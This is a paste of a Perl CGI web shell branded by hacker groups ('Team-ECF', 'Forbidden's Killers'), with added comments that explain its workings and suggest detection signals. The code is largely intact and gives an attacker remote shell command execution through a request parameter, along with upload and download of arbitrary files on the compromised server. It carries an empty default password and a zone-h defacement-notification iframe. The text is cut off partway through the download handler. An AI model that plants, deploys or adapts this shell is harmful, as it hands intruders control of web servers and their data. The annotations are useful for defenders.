1337_Brain

CGI Forbidden Bypass Shell MOD by Team-ECF

Jul 16th, 2017
598
0
Never
Perl 24.45 KB | None | 0 0
  1. #!/usr/bin/perl -I /usr/local/bandmin
  2. #------------------------------------------------------------------------------
  3. # Copyright (C) 2010 FoRB!ddeN's KiLLeRs
  4. #
  5. # EdiT3R: Leet Brain
  6. # EdiT3R e-mail: nadimzobaer@gmail.com
  7. # Author Homepage: http://www.nadimzobaer.com/
  8. # My Group : 3xp1r3.com
  9. # Greetz : ABO adaai - MooT HaCkEr - NaiF KSA
  10. #------------------------------------------------------------------------------
  # Analysis notes (code unchanged): global configuration for this CGI web shell.
  # $Password is the value PerformLogin and the SAVEDPWD cookie check compare
  # against. It is the empty string in this paste.
  11. $Password = "";    
  12.  
  13.  
  # $WinNT switches the command separator, the "print working directory"
  # command, the path separator and the redirection suffix derived below.
  14. $WinNT = 0;            
  15.  
  16. $NTCmdSep = "&";
  17.  
  18. $UnixCmdSep = ";";
  19.  
  # Seconds passed to alarm() in ExecuteCommand on non-Windows hosts.
  20. $CommandTimeoutDuration = 10;
  21.  
  # When true, ExecuteCommand reads output through a piped open line by line;
  # otherwise it runs the command with backticks.
  22. $ShowDynamicOutput = 1;
  23.  
  24.  
  25.  
  # Values derived from $WinNT; $Redirector is appended to every command string
  # that ExecuteCommand builds.
  26. $CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
  27. $CmdPwd = ($WinNT ? "cd" : "pwd");
  28. $PathSep = ($WinNT ? "\\" : "/");
  29. $Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
  30.  
  31.  
  # Analysis notes (code unchanged): request parser. Fills the global %in (or
  # the glob passed in @_) from the query string, a urlencoded POST body, or a
  # multipart/form-data upload. Nothing here validates or bounds the input.
  32. sub ReadParse
  33. {
  34.     local (*in) = @_ if @_;
  35.     local ($i, $loc, $key, $val);
  36.    
          # True when the Content-Type header announces a multipart body.
  37.     $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
  38.  
  39.     if($ENV{'REQUEST_METHOD'} eq "GET")
  40.     {
  41.         $in = $ENV{'QUERY_STRING'};
  42.     }
  43.     elsif($ENV{'REQUEST_METHOD'} eq "POST")
  44.     {
  45.         binmode(STDIN) if $MultipartFormData & $WinNT;
              # Reads as many bytes as the client-supplied Content-Length states.
  46.         read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
  47.     }
  48.  
  49.    
  50.     if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
  51.     {
              # The body is split on the boundary string. The first part is
              # treated as the uploaded file: its payload goes to
              # $in{'filedata'} and its filename= value to $in{'f'}.
  52.         $Boundary = '--'.$1;
  53.         @list = split(/$Boundary/, $in);
  54.         $HeaderBody = $list[1];
  55.         $HeaderBody =~ /\r\n\r\n|\n\n/;
  56.         $Header = $`;
  57.         $Body = $';
  58.          $Body =~ s/\r\n$//;
  59.         $in{'filedata'} = $Body;
  60.         $Header =~ /filename=\"(.+)\"/;
  61.         $in{'f'} = $1;
  62.         $in{'f'} =~ s/\"//g;
  63.         $in{'f'} =~ s/\s//g;
  64.  
  65.        
              # Remaining parts become ordinary fields: the first quoted word is
              # the key, the text after it (percent-decoded) is the value.
  66.         for($i=2; $list[$i]; $i++)
  67.         {
  68.             $list[$i] =~ s/^.+name=$//;
  69.             $list[$i] =~ /\"(\w+)\"/;
  70.             $key = $1;
  71.             $val = $';
  72.             $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
  73.             $val =~ s/%(..)/pack("c", hex($1))/ge;
  74.             $in{$key} = $val;
  75.         }
  76.     }
  77.     else
  78.     {
              # urlencoded input: split on "&", turn "+" into a space,
              # percent-decode key and value, join repeated keys with "\0".
  79.         @in = split(/&/, $in);
  80.         foreach $i (0 .. $#in)
  81.         {
  82.             $in[$i] =~ s/\+/ /g;
  83.             ($key, $val) = split(/=/, $in[$i], 2);
  84.             $key =~ s/%(..)/pack("c", hex($1))/ge;
  85.             $val =~ s/%(..)/pack("c", hex($1))/ge;
  86.             $in{$key} .= "\0" if (defined($in{$key}));
  87.             $in{$key} .= $val;
  88.         }
  89.     }
  90. }
  91.  
  92. sub PrintPageHeader
  93. {
  94.     $EncodedCurrentDir = $CurrentDir;
  95.     $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  96.     print "Content-type: text/html\n\n";
  97.     print <<END;
  98.    
  99.    
  100. <html>
  101. <head>
  102. <title> Team-ECF - Shell CGi </title>
  103. $HtmlMetaHeader
  104. </head>
  105. <style>
  106. BODY { SCROLLBAR-BASE-COLOR: #191919; SCROLLBAR-ARROW-COLOR: olive; }
  107. textarea{background-color:#191919;color:red;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1px solid #666666;}
  108. input{FONT-WEIGHT:normal;background-color: #191919;font-size: 13px;font-weight:bold;color: red; font-family: Tahoma; border: 1px solid #666666;height:17}
  109. </style>
  110. <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="82" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
  111.     <tr>
  112. <td bgcolor="#808080" bordercolor="#990000" align="center" width="48%" height="32">
  113.     <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
  114.     <font color="#990000"><span style="font-weight: 700">--[</span></font><font color="#FFFF00"><span style="font-weight: 700">
  115.     Shell CGI</span></font><span style="color: #DADADA; font-weight: 700">
  116.     </span><font color="#990000">
  117.     <span style="font-weight: 700">|</span></font><span style="color: #DADADA; font-weight: 700">
  118.     </span>
  119.     <font color="#00FF00"><span style="font-weight: 700">
  120.     Perl V1.0</span></font><span style="color: #DADADA; font-weight: 700">
  121.     </span>
  122.     <span style="color: #990000; font-weight: 700">]--</span></td>
  123.     </tr>
  124.     <tr>
  125.     <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
  126.     <td width="48%" height="51" valign="top" style="font-family: verdana; color: #d9d9d9; font-size: 11px" bordercolorlight="#DADADA" bordercolordark="#C0C0C0" bordercolor="#D9D9D9">
  127.     <p align="center">
  128.     <b><font color="#FF0000">--[</font><span style="color: #DADADA">
  129.     </span>
  130.     <font size="3" color="#FFFF00">Saver run Shell</font><span style="color: #DADADA">
  131.     </span><font color="#FF0000">]</font></b><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><b><font color="#FF0000">--
  132.     <span style="background-color: #C0C0C0">=-=</span> </font>
  133.     <font style="font-size: 9pt" color="#D9D9D9">--[</font><font color="#FF0000" style="font-size: 9pt">
  134.             </font>
  135.     </b>
  136.             <font style="font-weight: 700; background-color:#000000" color="#FFFFFF" size="3">$ServerName</font><font style="font-size: 9pt; font-weight: 700" color="#D9D9D9">
  137.             </font>
  138.     <a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none">
  139.             <b><font style="font-size: 9pt" color="#D9D9D9">]--</font></b></a></a></a></a></p>
  140.     <center>
  141.     <center>
  142.     <form method="POST">
  143.         <input type=hidden name=act value="mkfile" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #800000">
  144.         <input type=hidden name="d" value="<?php echo $dispd; ?>" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #800000">
  145.     </form></center></center></td></tr></table>
  146.     <p align="center">
  147.     <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none; background-color: #C0C0C0" href="$ScriptLocation?a=home">
  148.  
  149. <font color="#990000" face="Verdana" size="2">Home</font></a><font color="#990000" face="Verdana" size="2">
  150.     | <span style="background-color: #C0C0C0">
  151. <a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir"><font color="#990000">Upload File</span></font></a><font color="#990000">
  152.     | </font><span style="background-color: #C0C0C0">
  153. <a href="$ScriptLocation?a=download&d=$EncodedCurrentDir"><font color="#990000">Download File</font></a></span><font color="#990000">
  154.         | </font><span style="background-color: #C0C0C0">
  155. <a href="$ScriptLocation?a=logout"><font color="#990000">Disconnect</font></a></span></font>
  156.         | </font><span style="background-color: #C0C0C0">
  157. <a href="http://www.lauxanh.us"><font color="#990000">Lauxanh</font></a></span><font color="#990000"></p>
  158.  
  159. <body onLoad="document.f.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
  160. <div align="center">
  161.     <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="14" width="93%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
  162.         <tr><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
  163.             <td width="97%" height="14" valign="top" style="font-family: verdana; color: #d9d9d9; font-size: 11px" bordercolorlight="#DADADA" bordercolordark="#C0C0C0" bordercolor="#D9D9D9">
  164. <font size="3" color="#00FF00">
  165.  
  166. END
  167. }
  168.  
  169.  
  170. sub PrintLoginScreen
  171. {
  172.     $Message = q$</font><font color="#FFFF00" size="3">
  173. <div align="center">
  174.     <pre>
  175. #-------------------------------------------------------------------------------------------#
  176. |                                  Forbidden's Killers                                      |
  177. |                                                                                           |
  178. |                                      All The Way                                          |
  179. |                                                                                           |
  180. |                                     Edited By Team-ECF                                         |
  181. |                                                                                           |
  182. #-------------------------------------------------------------------------------------------#
  183. |                              WebSite : blog.ecf.me                                   |
  184. #-------------------------------------------------------------------------------------------#
  185. |             Greetz To : My Group - ABO adaai - MooT HaCkEr - NaiF KSA                     |
  186. #-------------------------------------------------------------------------------------------#</font></div><font size="3" color="#00FF00">
  187.  
  188. </html>
  189. $;
  190. #'
  191.     print <<END;
  192. <code>$Message
  193. END
  194. }
  195.  
  196. sub PrintLoginFailedMessage
  197. {
  198.     print <<END;
  199. <code>
  200. <p align="center">&nbsp;</p>
  201. <p align="center"><font color="#FF0000">#</font><font color="#FFFFFF">--------------------------------------------------------------------------------------------------</font><font color="#FF0000">#</font></p>
  202. <p align="center"><b>
  203. <font size="6" color="#C0C0C0">OoPs !!! = </font><font size="6" color="#FF0000">Wr0nG P4sSw0rD</font></b></p>
  204. <p align="center"><b><font size="6" color="#FFFF00">
  205. Try Again</font></b></p>
  206. <p align="center"><font color="#FF0000">#</font><font color="#FFFFFF">--------------------------------------------------------------------------------------------------</font><font color="#FF0000">#</font></p>
  207. <p align="center"><font color="#FFFFFF"><br>
  208. &nbsp;</font></p>
  209. </code>
  210. END
  211. }
  212.  
  213. sub PrintLoginForm
  214. {
  215.     print <<END;
  216. <code>
  217. <body>
  218.  
  219. <form name="f" method="POST" action="$ScriptLocation">
  220. <input type="hidden" name="a" value="login">
  221. <p align="center"><b><font size="3" color="#FF0000">
  222. I</font><font size="3" color="#C0C0C0">nt</font><font size="3" color="#FF0000">e</font><font size="3" color="#C0C0C0">r
  223. Th</font><font size="3" color="#FF0000">e</font><font size="3" color="#C0C0C0">
  224. Pa</font><font size="3" color="#FF0000">ss</font><font size="3" color="#C0C0C0">W</font><font size="3" color="#FF0000">o</font><font size="3" color="#C0C0C0">rd<u><span style="background-color: #333333">
  225. </span> </u> </font></b>
  226. </p>
  227. <p align="center"><font size="3" color="#990000"> &nbsp;</font><input type="password" name="p" size="38"></p>
  228. <p align="center"><input type="submit" value="Enter">
  229. </p>
  230. </form>
  231. </code>
  232. END
  233. }
  234.  
  235. sub PrintPageFooter
  236. {
  237.     print <<END;
  238. <code>
  239. <TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
  240.     <td width="50%" height="1" valign="top" style="font-family: verdana; color: #d9d9d9; font-size: 11px">
  241.     <p align="center"><b>
  242.     --[ T<font color="#FF0000">G</font>B <font color="#FFFFFF">
  243.     <span lang="en-us">|</span></font>
  244.     <a href="http://Xgroupvn.Org" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font color="#FF0000">
  245.     http://XGroupvn.Org</font></a> <font color="#FFFFFF"><span lang="en-us">|</span></font> T<font color="#FF0000">G</font>B ]--</b></td></tr></table>
  246. </code>
  247. END
  248. }
  249.  
  250.  
  # Analysis notes (code unchanged): splits the HTTP_COOKIE header on "; " and
  # stores each name/value pair in the global %Cookies. The dispatch code at the
  # end of the file reads $Cookies{'SAVEDPWD'} from this hash.
  251. sub GetCookies
  252. {
  253.     @httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
  254.     foreach $cookie(@httpcookies)
  255.     {
  256.         ($id, $val) = split(/=/, $cookie);
  257.         $Cookies{$id} = $val;
  258.     }
  259. }
  260.  
  261. sub home
  262. {
  263.         &PrintPageHeader("p");
  264.         &PrintCommandLineInputForm;
  265.         &PrintPageFooter;
  266. END
  267. }
  268.  
  269. sub zone
  270. {
  271.     print <<END;
  272. <code>
  273. <p align="center">
  274. <IFRAME WIDTH="915" HEIGHT="978" SRC="http://www.zone-h.org/notify/single"></IFRAME>
  275. </p>
  276. END
  277. }
  278.  
  279. sub kasber
  280. {
  281.     print <<END;
  282. <code>
  283. <p>&nbsp;</p>
  284. <p>&nbsp;</p>
  285. <table border="1" width="100%" cellspacing="0" cellpadding="2" height="59">
  286. <tr>
  287. <td bgcolor="#808080" bordercolor="#990000" align="center" width="3%" height="32">
  288. <table border="1" width="100%" cellspacing="0" cellpadding="2" height="59">
  289. <tr>
  290. <td bgcolor="#808080" bordercolor="#990000" align="center" width="3%" height="32">
  291. <font size="5" color="#C0C0C0"><b>Edited Code By Thieugiabuon</b></font></td>
  292. </tr>
  293. <tr>
  294. <td bgcolor="#C0C0C0" height="25">
  295. <p align="center"><b><font size="5" color="#990000">My Email</font><font size="5" color="#808080">
  296. </font><font size="5" color="#990000"><span style="background-color: #808080">:</span></font><font size="5" color="#808080">
  297. </font><font size="5" color="#990000">Kill ALL</font></b><p align="center">
  298. <b>
  299. <font size="5" color="#666666"></font><font size="5" color="#990000">
  300. <span style="background-color: #808080">:</span>
  301. <span style="background-color: #808080">+</span>
  302. <span style="background-color: #808080">+</span></font></b></td>
  303. </tr>
  304. </table>
  305. </td>
  306. </tr>
  307. </table>
  308. <p>&nbsp;</p>
  309. <p>&nbsp;</p>
  310.             <p align="center"></p>
  311. </code>
  312. END
  313. }
  314.  
  315. sub PrintLogoutScreen
  316. {
  317.     print "<code>Connection are closed by The Perl</code>";
  318. }
  319.  
  320. sub kasber
  321. {
  322.     &PrintPageHeader("p");
  323.     print <<END;
  324. <code>
  325. <p>&nbsp;</p>
  326. <p>&nbsp;</p>
  327. <table border="1" width="100%" cellspacing="0" cellpadding="2" height="59">
  328. <tr>
  329. <td bgcolor="#808080" bordercolor="#990000" align="center" width="3%" height="32">
  330. <table border="1" width="100%" cellspacing="0" cellpadding="2" height="59">
  331. <tr>
  332. <td bgcolor="#808080" bordercolor="#990000" align="center" width="3%" height="32">
  333. <font size="5" color="#C0C0C0"><b>Ed!T c0d3 By Dr.KAsBeR</b></font></td>
  334. </tr>
  335. <tr>
  336. <td bgcolor="#C0C0C0" height="25">
  337. <p align="center"><b><font size="5" color="#990000">My Email</font><font size="5" color="#808080">
  338. </font><font size="5" color="#990000"><span style="background-color: #808080">:</span></font><font size="5" color="#808080">
  339. </font><font size="5" color="#990000">Dr.KAsBeR403 [at] GmaiL [dot] CoM</font></b><p align="center">
  340. <b>
  341. <font size="5" color="#666666">Gr33tZ To</font><font size="5" color="#990000">
  342. <span style="background-color: #808080">:</span> Dr.DaShEr
  343. <span style="background-color: #808080">+</span> NeX
  344. <span style="background-color: #808080">+</span> RmZ AlJnOoP</font></b></td>
  345. </tr>
  346. </table>
  347. </td>
  348. </tr>
  349. </table>
  350. <p>&nbsp;</p>
  351. <p>&nbsp;</p>
  352. </code>
  353. END
  354. }
  355.  
  356.  
  357. sub zone
  358. {
  359.     &PrintPageHeader("p");
  360.     print <<END;
  361. <code>
  362. <p align="center">
  363. <IFRAME WIDTH="915" HEIGHT="978" SRC="http://www.zone-h.org/notify/single"></IFRAME>
  364. </p>
  365. </code>
  366. END
  367. }
  368.  
  # Analysis notes (code unchanged): emits "Set-Cookie: SAVEDPWD=;" to blank the
  # session cookie, then prints the logout notice and the login page.
  369. sub PerformLogout
  370. {
  371.     print "Set-Cookie: SAVEDPWD=;\n";
  372.     &PrintPageHeader("p");
  373.     &PrintLogoutScreen;
  374.     &PrintLoginScreen;
  375.     &PrintLoginForm;
  376.     &PrintPageFooter;
  377. }
  378.  
  379.  
  # Analysis notes (code unchanged): compares the submitted "p" parameter with
  # $Password. On a match the password is written into the SAVEDPWD cookie in
  # clear text and the command form is shown. Otherwise the login page is shown
  # again, with the failure banner only if a non-empty password was submitted.
  # Detection: a "Set-Cookie: SAVEDPWD=" response header from a CGI path is a
  # network-side indicator for this shell.
  380. sub PerformLogin
  381. {
  382.     if($LoginPassword eq $Password)
  383.     {
  384.         print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
  385.         &PrintPageHeader("c");
  386.         &PrintCommandLineInputForm;
  387.         &PrintPageFooter;
  388.     }
  389.     else # password didn't match
  390.     {
  391.         &PrintPageHeader("p");
  392.         &PrintLoginScreen;
  393.         if($LoginPassword ne "")
  394.         {
  395.             &PrintLoginFailedMessage;
  396.         }
  397.         &PrintLoginForm;
  398.         &PrintPageFooter;
  399.     }
  400. }
  401.  
  402.  
  403. sub PrintCommandLineInputForm
  404. {
  405.     $Prompt = $WinNT ? "$CurrentDir> " : "[love\@$ServerName $CurrentDir]\$ ";
  406.     print <<END;
  407. <code>
  408. <form name="f" method="POST" action="$ScriptLocation">
  409. <input type="hidden" name="a" value="command">
  410. <input type="hidden" name="d" value="$CurrentDir">
  411. <p align="center">&nbsp;</p>
  412. </font>
  413. <p align="center"><font size="3" color="#00FF00">
  414.  
  415. <font color="#FFFF00">$Prompt</font>
  416. <input type="text" name="c" size="40">
  417. </p>
  418. <p align="center">
  419. <input type="submit" value="Enter">
  420. </p>
  421. </form>
  422. </code>
  423. END
  424. }
  425.  
  426.  
  427. sub PrintFileDownloadForm
  428. {
  429.     $Prompt = $WinNT ? "$CurrentDir> " : "[love\@$ServerName $CurrentDir]\$ ";
  430.     print <<END;
  431. <code>
  432. <body>
  433.  
  434. <form name="f" method="POST" action="$ScriptLocation">
  435. <input type="hidden" name="d" value="$CurrentDir">
  436. <input type="hidden" name="a" value="download">
  437. </font><font size="3" color="#FF0000">
  438.  
  439. <p align="center">$Prompt download</font><font size="3" color="#00FF00"><br><br>
  440. </font><font size="3" color="#FFFF00">
  441.  
  442. Filename:</font><font size="3" color="#00FF00">
  443.  
  444. <input type="text" name="f" size="35"><br><br>
  445. </font><font size="3" color="#FFFFFF">
  446.  
  447. Download:</font><font size="3" color="#00FF00">
  448.  
  449. <input type="submit" value="Begin">
  450. </p>
  451. </form>
  452. </code>
  453. END
  454. }
  455.  
  456.  
  457. sub PrintFileUploadForm
  458. {
  459.     $Prompt = $WinNT ? "$CurrentDir> " : "[love\@$ServerName $CurrentDir]\$ ";
  460.     print <<END;
  461. <code>
  462. </font><font size="3" color="#FF0000">
  463.  
  464. <form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
  465. <p align="center">$Prompt upload</font><font size="3" color="#00FF00"><br><br>
  466. </font><font size="3" color="#FFFF00">
  467.  
  468. Filename:</font><font size="3" color="#00FF00">
  469.  
  470. <a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
  471. <input type="file" name="f0" size="35"></a><br><br>
  472. Options: &nbsp;<input type="checkbox" name="o" value="overwrite" checked>
  473. </font><font size="3" color="#FFFF00">
  474.  
  475. Overwrite if it Exists</font><font size="3" color="#00FF00"><br><br>
  476. </font><font size="3" color="#FFFFFF">
  477.  
  478. Upload:</font><font size="3" color="#00FF00">&nbsp;&nbsp;&nbsp;<input type="submit" value="Begin">
  479. <input type="hidden" name="d" value="$CurrentDir">
  480. <input type="hidden" name="a" value="upload">
  481. </p>
  482. </form>
  483. </code>
  484. END
  485. }
  486.  
  487.  
  # Analysis notes (code unchanged): SIGALRM handler that ExecuteCommand
  # installs on non-Windows hosts. It cancels the alarm, prints a timeout
  # notice plus the command form and footer, and exits the CGI process. No
  # explicit signal to the child command is visible here, despite the message.
  488. sub CommandTimeout
  489. {
  490.     if(!$WinNT)
  491.     {
  492.         alarm(0);
  493.         print <<END;
  494. </xmp>
  495. <code>
  496. Command exceeded maximum time of $CommandTimeoutDuration second(s).
  497. <br>Killed it!
  498. <code>
  499. END
  500.         &PrintCommandLineInputForm;
  501.         &PrintPageFooter;
  502.         exit;
  503.     }
  504. }
  505.  
  506.  
  # Analysis notes (code unchanged): the remote command execution core. The
  # global $RunCommand (request parameter "c") and $CurrentDir (request
  # parameter "d") are concatenated into a shell command line with no filtering
  # visible in this file. The output is written back into the HTML response.
  # Detection: each request with a=command spawns a shell child of whatever
  # account runs the CGI. Process-creation telemetry with the web server or CGI
  # handler as parent is the host-side signal.
  507. sub ExecuteCommand
  508. {
  509.     if($RunCommand =~ m/^\s*cd\s+(.+)/)
  510.     {
  511.         # we change the directory internally. The output of the
  512.         # command is not displayed.
  513.        
              # Runs: cd "<old dir>" ; cd <requested dir> ; pwd (or "cd" on
              # Windows) and keeps the printed path as the new $CurrentDir. The
              # forms echo that value back in their hidden "d" field.
  514.         $OldDir = $CurrentDir;
  515.         $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
  516.         chop($CurrentDir = `$Command`);
  517.         &PrintPageHeader("c");
  518.         $Prompt = $WinNT ? "$OldDir> " : "[love\@$ServerName $OldDir]\$ ";
  519.         print "<code>$Prompt $RunCommand</code>";
  520.     }
  521.     else # some other command, display the output
  522.     {
  523.         &PrintPageHeader("c");
  524.         $Prompt = $WinNT ? "$CurrentDir> " : "[love\@$ServerName $CurrentDir]\$ ";
  525.         print "<code>$Prompt $RunCommand</code><xmp>";
              # Command line: cd "<dir>" <sep> <command> <redirection suffix>.
  526.         $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
  527.         if(!$WinNT)
  528.         {
                  # Arms the timeout; CommandTimeout runs if it expires.
  529.             $SIG{'ALRM'} = \&CommandTimeout;
  530.             alarm($CommandTimeoutDuration);
  531.         }
  532.         if($ShowDynamicOutput)
  533.         {
                  # Unbuffered output; the command runs through a two-argument
                  # piped open and is echoed line by line.
  534.             $|=1;
  535.             $Command .= " |";
  536.             open(CommandOutput, $Command);
  537.             while(<CommandOutput>)
  538.             {
  539.                 $_ =~ s/(\n|\r\n)$//;
  540.                 print "$_\n";
  541.             }
  542.             $|=0;
  543.         }
  544.         else
  545.         {
  546.             print `$Command`;
  547.         }
  548.         if(!$WinNT)
  549.         {
  550.             alarm(0);
  551.         }
  552.         print "</xmp>";
  553.     }
  554.     &PrintCommandLineInputForm;
  555.     &PrintPageFooter;
  556. }
  557.  
  558.  
  559.  
  560. sub PrintDownloadLinkPage
  561. {
  562.     local($FileUrl) = @_;
  563.     if(-e $FileUrl)
  564.     {
  565.  
  566.         $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  567.         $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
  568.         $HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
  569.         &PrintPageHeader("c");
  570.         print <<END;
  571. <code>
  572. <p align="center">Sending File $TransferFile...<br>
  573. If the download does not start automatically,
  574. <a href="$DownloadLink">Click Here</a>.</p>
  575. </code>
  576. END
  577.         &PrintCommandLineInputForm;
  578.         &PrintPageFooter;
  579.     }
  580.     else # file doesn't exist
  581.     {
  582.         &PrintPageHeader("f");
  583.         print "<code>Failed to download $FileUrl: $!</code>";
  584.         &PrintFileDownloadForm;
  585.         &PrintPageFooter;
  586.     }
  587. }
  588.  
  # Analysis notes (code unchanged): streams the file at the given path to the
  # client as an attachment. The path is built by DownloadFile from request
  # parameters, so any file the CGI account can read can be retrieved.
  # Detection: responses from a CGI path carrying
  # "Content-Type: application/x-unknown" with a Content-Disposition attachment.
  589. sub SendFileToBrowser
  590. {
  591.     local($SendFile) = @_;
  592.     if(open(SENDFILE, $SendFile))
  593.     {
  594.         if($WinNT)
  595.         {
  596.             binmode(SENDFILE);
  597.             binmode(STDOUT);
  598.         }
              # Size comes from stat(); the regex capture $1 (the text after
              # the last path separator) is used as the attachment filename.
  599.         $FileSize = (stat($SendFile))[7];
  600.         ($Filename = $SendFile) =~  m!([^/^\\]*)$!;
  601.         print "Content-Type: application/x-unknown\n";
  602.         print "Content-Length: $FileSize\n";
  603.         print "Content-Disposition: attachment; filename=$1\n\n";
  604.         print while(<SENDFILE>);
  605.         close(SENDFILE);
  606.     }
  607.     else
  608.     {
  609.         &PrintPageHeader("f");
  610.         print "<code>Failed to download $SendFile: $!</code>";
  611.         &PrintFileDownloadForm;
  612.         &PrintPageFooter;
  613.     }
  614. }
  615.  
  616.  
  617.  
  618. sub BeginDownload
  619. {
  620.  
  621.     if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
  622.         (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  623.     {
  624.         $TargetFile = $TransferFile;
  625.     }
  626.     else
  627.     {
  628.         chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  629.         $TargetFile .= $PathSep.$TransferFile;
  630.     }
  631.  
  632.     if($Options eq "go")
  633.     {
  634.         &SendFileToBrowser($TargetFile);
  635.     }
  636.     else
  637.     {
  638.         &PrintDownloadLinkPage($TargetFile);
  639.     }
  640. }
  641.  
  642. sub UploadFile
  643. {
  644.    
  645.     if($TransferFile eq "")
  646.     {
  647.         &PrintPageHeader("f");
  648.         &PrintFileUploadForm;
  649.         &PrintPageFooter;
  650.         return;
  651.     }
  652.     &PrintPageHeader("c");
  653.  
  654.    
  655.     print "<code>Uploading $TransferFile to $CurrentDir...<br>";
  656.  
  657.  
  658.     chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
  659.     $TransferFile =~ m!([^/^\\]*)$!;
  660.     $TargetName .= $PathSep.$1;
  661.  
  662.     $TargetFileSize = length($in{'filedata'});
  663.  
  664.     if(-e $TargetName && $Options ne "overwrite")
  665.     {
  666.         print "Failed: Destination file already exists.<br>";
  667.     }
  668.     else # file is not present
  669.     {
  670.         if(open(UPLOADFILE, ">$TargetName"))
  671.         {
  672.             binmode(UPLOADFILE) if $WinNT;
  673.             print UPLOADFILE $in{'filedata'};
  674.             close(UPLOADFILE);
  675.             print "Transfered $TargetFileSize Bytes.<br>";
  676.             print "File Path: $TargetName<br>";
  677.         }
  678.         else
  679.         {
  680.             print "Failed: $!<br>";
  681.         }
  682.     }
  683.     print "</code>";
  684.     &PrintCommandLineInputForm;
  685.     &PrintPageFooter;
  686. }
  687.  
  # Analysis notes (code unchanged): second definition of UploadFile in this
  # file, with the same body as the earlier one. Perl keeps the later
  # definition. It writes the uploaded payload ($in{'filedata'}, set by
  # ReadParse) into the directory named by request parameter "d", under the
  # basename of the client-supplied filename.
  # Detection: new or modified files appearing in directories writable by the
  # CGI account. File-integrity monitoring on web roots covers this.
  688. sub UploadFile
  689. {
  690.    
          # No filename submitted: just show the upload form.
  691.     if($TransferFile eq "")
  692.     {
  693.         &PrintPageHeader("f");
  694.         &PrintFileUploadForm;
  695.         &PrintPageFooter;
  696.         return;
  697.     }
  698.     &PrintPageHeader("c");
  699.  
  700.    
  701.     print "<code>Uploading $TransferFile to $CurrentDir...<br>";
  702.  
  703.  
          # Target path = current directory (trailing separator removed)
          # + path separator + last path component of the uploaded filename.
  704.     chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
  705.     $TransferFile =~ m!([^/^\\]*)$!;
  706.     $TargetName .= $PathSep.$1;
  707.  
  708.     $TargetFileSize = length($in{'filedata'});
  709.  
          # An existing file is replaced only when option "o" is "overwrite";
          # the upload form sends that value by default (checkbox is checked).
  710.     if(-e $TargetName && $Options ne "overwrite")
  711.     {
  712.         print "Failed: Destination file already exists.<br>";
  713.     }
  714.     else # file is not present
  715.     {
  716.         if(open(UPLOADFILE, ">$TargetName"))
  717.         {
  718.             binmode(UPLOADFILE) if $WinNT;
  719.             print UPLOADFILE $in{'filedata'};
  720.             close(UPLOADFILE);
  721.             print "Transfered $TargetFileSize Bytes.<br>";
  722.             print "File Path: $TargetName<br>";
  723.         }
  724.         else
  725.         {
  726.             print "Failed: $!<br>";
  727.         }
  728.     }
  729.     print "</code>";
  730.     &PrintCommandLineInputForm;
  731.     &PrintPageFooter;
  732. }
  733.  
  734.  
  # Analysis notes (code unchanged): handler for a=download. It resolves request
  # parameter "f" to a path and either streams the file (o=go) or prints an
  # intermediate page that links to the o=go URL.
  735. sub DownloadFile
  736. {
  737.  
          # No filename submitted: just show the download form.
  738.     if($TransferFile eq "")
  739.     {
  740.         &PrintPageHeader("f");
  741.         &PrintFileDownloadForm;
  742.         &PrintPageFooter;
  743.         return;
  744.     }
  745.    
  746.  
          # Absolute paths are used as given; anything else is appended to the
          # current directory taken from request parameter "d".
  747.     if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
  748.         (!$WinNT & ($TransferFile =~ m/^\//)))
  749.     {
  750.         $TargetFile = $TransferFile;
  751.     }
  752.     else
  753.     {
  754.         chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  755.         $TargetFile .= $PathSep.$TransferFile;
  756.     }
  757.  
